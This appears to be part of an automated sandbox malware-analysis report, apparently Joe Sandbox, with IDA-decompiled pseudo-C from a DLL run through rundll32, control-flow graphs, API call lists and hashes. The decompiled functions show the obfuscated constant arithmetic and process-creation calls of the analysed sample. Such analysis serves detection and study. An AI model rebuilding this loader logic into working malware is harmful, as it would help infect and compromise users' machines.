                                                                                                                                    						E002DDA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
                                                                                                                                    						_push(_v1564);
                                                                                                                                    						_push(_v1580);
                                                                                                                                    						E002C47CE( &_v520, _v1684, _v1640, _v1596, _v1568, E002DDCF7(_v1640, 0x2c1140, __eflags),  &_v1040, _v1692, _v1632);
                                                                                                                                    						_t395 = _v1584;
                                                                                                                                    						E002CA8B0(_t395, _t375, _v1592);
                                                                                                                                    						_t446 = _t446 - 0xc + 0x58;
                                                                                                                                    						_t439 = 0x2f8e73a;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					_t457 = _t439 - 0xeef82b0;
                                                                                                                                    					if(_t439 == 0xeef82b0) {
                                                                                                                                    						_push(_v1696);
                                                                                                                                    						_push(_v1652);
                                                                                                                                    						_t381 = E002CB23C(_v1572, _v1576, E002DDCF7(_v1644, 0x2c10c0, _t457), _v1600, _v1664,  &_v1560); // executed
                                                                                                                                    						_t395 = _v1648;
                                                                                                                                    						asm("sbb edi, edi");
                                                                                                                                    						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
                                                                                                                                    						E002CA8B0(_t395, _t379, _v1588);
                                                                                                                                    						_t446 =  &(_t446[7]);
                                                                                                                                    					}
                                                                                                                                    					L20:
                                                                                                                                    					if(_t439 != 0xdf158d7) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L23;
                                                                                                                                    				}
                                                                                                                                    				E002C4B61( &_v1560, 0x208, _v1616, _v1624);
                                                                                                                                    				_pop(_t395);
                                                                                                                                    				_t439 = 0x99a67ee;
                                                                                                                                    				goto L20;
                                                                                                                                    			}

                                                                                                                                    0x002cff8c
                                                                                                                                    0x002cff8c
                                                                                                                                    0x002cff8e
                                                                                                                                    0x002cff91
                                                                                                                                    0x002cff91
                                                                                                                                    0x002cff94
                                                                                                                                    0x002cff94
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff66
                                                                                                                                    0x002cfe0a
                                                                                                                                    0x002cff52
                                                                                                                                    0x002cff54
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff54
                                                                                                                                    0x002cfe16
                                                                                                                                    0x002cfe8f
                                                                                                                                    0x002cfe9a
                                                                                                                                    0x002cfe9e
                                                                                                                                    0x002cfead
                                                                                                                                    0x002cfeae
                                                                                                                                    0x002cfecf
                                                                                                                                    0x002cfed4
                                                                                                                                    0x002cfee0
                                                                                                                                    0x002cff22
                                                                                                                                    0x002cff2e
                                                                                                                                    0x002cff37
                                                                                                                                    0x002cff3c
                                                                                                                                    0x002cff3f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cff3f
                                                                                                                                    0x002cfe18
                                                                                                                                    0x002cfe1e
                                                                                                                                    0x002cfe24
                                                                                                                                    0x002cfe2d
                                                                                                                                    0x002cfe5e
                                                                                                                                    0x002cfe6a
                                                                                                                                    0x002cfe74
                                                                                                                                    0x002cfe7c
                                                                                                                                    0x002cfe82
                                                                                                                                    0x002cfe87
                                                                                                                                    0x002cfe87
                                                                                                                                    0x002cffc3
                                                                                                                                    0x002cffc9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cffcf
                                                                                                                                    0x002cffb7
                                                                                                                                    0x002cffbd
                                                                                                                                    0x002cffbe
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                                    • API String ID: 1514166925-3316477785
                                                                                                                                    • Opcode ID: 3de381f1716e38af5a1119eb2e118db8b9bfdea8e4311385d14d93c56549cd40
                                                                                                                                    • Instruction ID: fd85ee7585f43aa7cb1c067736e26c85832bf607846a98642a2f2017cbaa048d
                                                                                                                                    • Opcode Fuzzy Hash: 3de381f1716e38af5a1119eb2e118db8b9bfdea8e4311385d14d93c56549cd40
                                                                                                                                    • Instruction Fuzzy Hash: B70210725183818FD368CF25C58AA1BBBE2FBC5718F108A1DF199862A0D7B58959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 267 2ce991-2cea60 268 2cea90-2cea96 267->268 269 2cea62-2cea77 call 2cf8fd 267->269 269->268 272 2cea79-2cea88 call 2c93ed 269->272 274 2cea8d 272->274 274->268
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			_entry_(intOrPtr _a4, char _a8) {
                                                                                                                                    				unsigned int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				intOrPtr _v36;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				signed int _t85;
                                                                                                                                    				signed int _t86;
                                                                                                                                    				signed int _t87;
                                                                                                                                    
                                                                                                                                    				_v32 = _v32 & 0x00000000;
                                                                                                                                    				_v44 = 0xa88528;
                                                                                                                                    				_v40 = 0x811176;
                                                                                                                                    				_v36 = 0xed2c64;
                                                                                                                                    				_v20 = 0x893932;
                                                                                                                                    				_v20 = _v20 ^ 0x2faf083b;
                                                                                                                                    				_v20 = _v20 ^ 0x2f2d1c53;
                                                                                                                                    				_v8 = 0xbe2d1;
                                                                                                                                    				_t85 = 0x2e;
                                                                                                                                    				_v8 = _v8 / _t85;
                                                                                                                                    				_v8 = _v8 >> 0xd;
                                                                                                                                    				_v8 = _v8 + 0xffff961f;
                                                                                                                                    				_v8 = _v8 ^ 0xfff451d0;
                                                                                                                                    				_v16 = 0x50855f;
                                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                                    				_t86 = 0x5e;
                                                                                                                                    				_v16 = _v16 / _t86;
                                                                                                                                    				_v16 = _v16 ^ 0x0002614f;
                                                                                                                                    				_v28 = 0x752e5d;
                                                                                                                                    				_t36 =  &_v28; // 0x752e5d
                                                                                                                                    				_t87 = 0x4e;
                                                                                                                                    				_v28 =  *_t36 * 0x6f;
                                                                                                                                    				_v28 = _v28 ^ 0x32c1ec83;
                                                                                                                                    				_v12 = 0xba9db2;
                                                                                                                                    				_v12 = _v12 * 0x41;
                                                                                                                                    				_v12 = _v12 + 0xfc46;
                                                                                                                                    				_v12 = _v12 | 0x4911db39;
                                                                                                                                    				_v12 = _v12 ^ 0x6f7f0271;
                                                                                                                                    				_v24 = 0x2e0372;
                                                                                                                                    				_v24 = _v24 / _t87;
                                                                                                                                    				_v24 = _v24 ^ 0x000c7ca5;
                                                                                                                                    				_t58 =  &_a8;
                                                                                                                                    				 *_t58 = _a8 - 1;
                                                                                                                                    				if( *_t58 == 0) {
                                                                                                                                    					 *0x2e320c = _a4;
                                                                                                                                    					if(E002CF8FD() != 0) {
                                                                                                                                    						E002C93ED(); // executed
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return 1;
                                                                                                                                    			}

















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID: ].u$d,
                                                                                                                                    • API String ID: 621844428-1507873175
                                                                                                                                    • Opcode ID: 78a260d4cdedb163ccfc71875ce4f2cc58c1dceabb7b0ce884a094c2c298ea87
                                                                                                                                    • Instruction ID: 0443f33e0c27a3e4b4757e0a24c315a2f7ad9be6fda99b6eda418a849f79ea4d
                                                                                                                                    • Opcode Fuzzy Hash: 78a260d4cdedb163ccfc71875ce4f2cc58c1dceabb7b0ce884a094c2c298ea87
                                                                                                                                    • Instruction Fuzzy Hash: 8F31F471D0020AEBDB08DFA5DA8A69EBBF1FB54304F208199D510BB254D7B45B95DF80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 288 2cab87-2cad94 call 2d20b9 call 2c4b61 call 2c7f5d 294 2cad99-2cad9e 288->294 295 2caddd 294->295 296 2cada0-2cada2 294->296 297 2caddf-2cade5 295->297 298 2cada4-2cadaa 296->298 299 2cadb0-2caddb call 2d1e67 * 2 296->299 300 2cadab-2cadae 298->300 299->300 300->297
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E002CAB87(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                    				void* _t151;
                                                                                                                                    				void* _t163;
                                                                                                                                    				void* _t164;
                                                                                                                                    				signed int _t169;
                                                                                                                                    				signed int _t170;
                                                                                                                                    				signed int _t171;
                                                                                                                                    				intOrPtr _t187;
                                                                                                                                    				intOrPtr _t190;
                                                                                                                                    				intOrPtr* _t193;
                                                                                                                                    				void* _t194;
                                                                                                                                    
                                                                                                                                    				_t193 = _t194 - 0x5c;
                                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x7c)));
                                                                                                                                    				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
                                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x78)));
                                                                                                                                    				_push(0);
                                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x70)));
                                                                                                                                    				_push(_t187);
                                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x68)));
                                                                                                                                    				_push( *((intOrPtr*)(_t193 + 0x64)));
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t151);
                                                                                                                                    				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
                                                                                                                                    				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
                                                                                                                                    				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
                                                                                                                                    				 *(_t193 + 0x34) = 0xb35e3d;
                                                                                                                                    				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
                                                                                                                                    				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
                                                                                                                                    				 *(_t193 + 0x1c) = 0xb39a57;
                                                                                                                                    				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
                                                                                                                                    				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
                                                                                                                                    				 *(_t193 + 0x54) = 0x8cfebd;
                                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
                                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
                                                                                                                                    				_t169 = 0x1d;
                                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
                                                                                                                                    				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
                                                                                                                                    				 *(_t193 + 0x24) = 0xadd23a;
                                                                                                                                    				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
                                                                                                                                    				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
                                                                                                                                    				 *(_t193 + 0x20) = 0x1d5481;
                                                                                                                                    				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
                                                                                                                                    				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
                                                                                                                                    				 *(_t193 + 0x2c) = 0x3c40b3;
                                                                                                                                    				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
                                                                                                                                    				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
                                                                                                                                    				 *(_t193 + 0x3c) = 0x52e0cb;
                                                                                                                                    				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
                                                                                                                                    				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
                                                                                                                                    				 *(_t193 + 0x4c) = 0x46a878;
                                                                                                                                    				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
                                                                                                                                    				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
                                                                                                                                    				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
                                                                                                                                    				 *(_t193 + 0x30) = 0x13da24;
                                                                                                                                    				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
                                                                                                                                    				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
                                                                                                                                    				 *(_t193 + 0x44) = 0xdb90c5;
                                                                                                                                    				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
                                                                                                                                    				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
                                                                                                                                    				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
                                                                                                                                    				 *(_t193 + 0x38) = 0xc3d0db;
                                                                                                                                    				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
                                                                                                                                    				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
                                                                                                                                    				 *(_t193 + 0x58) = 0x1a470a;
                                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
                                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
                                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
                                                                                                                                    				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
                                                                                                                                    				 *(_t193 + 0x40) = 0xc6f633;
                                                                                                                                    				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
                                                                                                                                    				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
                                                                                                                                    				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
                                                                                                                                    				 *(_t193 + 0x50) = 0xa2e0bb;
                                                                                                                                    				_t170 = 0x56;
                                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
                                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
                                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
                                                                                                                                    				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
                                                                                                                                    				 *(_t193 + 0x28) = 0x4b9267;
                                                                                                                                    				_t171 = 0x28;
                                                                                                                                    				_t115 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                                    				_t172 = _t115;
                                                                                                                                    				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
                                                                                                                                    				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
                                                                                                                                    				 *(_t193 + 0x48) = 0xd50758;
                                                                                                                                    				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
                                                                                                                                    				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
                                                                                                                                    				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
                                                                                                                                    				_push( *(_t193 + 0x1c));
                                                                                                                                    				_push( *(_t193 + 0x34));
                                                                                                                                    				_t190 = 0x44;
                                                                                                                                    				E002C4B61(_t115, _t190);
                                                                                                                                    				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
                                                                                                                                    				_t129 = _t193 - 4; // 0x181c8c00
                                                                                                                                    				_t131 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                                    				_t163 = E002C7F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
                                                                                                                                    				if(_t163 == 0) {
                                                                                                                                    					_t164 = 0;
                                                                                                                                    				} else {
                                                                                                                                    					if(_t187 == 0) {
                                                                                                                                    						E002D1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
                                                                                                                                    						E002D1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
                                                                                                                                    					} else {
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    					}
                                                                                                                                    					_t164 = 1;
                                                                                                                                    				}
                                                                                                                                    				return _t164;
                                                                                                                                    			}













                                                                                                                                    0x002cade5

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID: nJQ
                                                                                                                                    • API String ID: 963392458-2884827605
                                                                                                                                    • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                    • Instruction ID: ab265ebe1fa7588ff233558fbf1bb64ee2926006b431581dec47c7d890a35f85
                                                                                                                                    • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                    • Instruction Fuzzy Hash: 3F71F27241028CEBCF59CFA4C9499CE3BA1FF48358F108219FE1696220D3B6C969DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 501242067-0
                                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                    • GlobalHandle.KERNEL32(005778E8), ref: 100208A9
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                    • GlobalHandle.KERNEL32(005778E8), ref: 100208DB
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 496899490-0
                                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                                    APIs
                                                                                                                                    • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1263568516-0
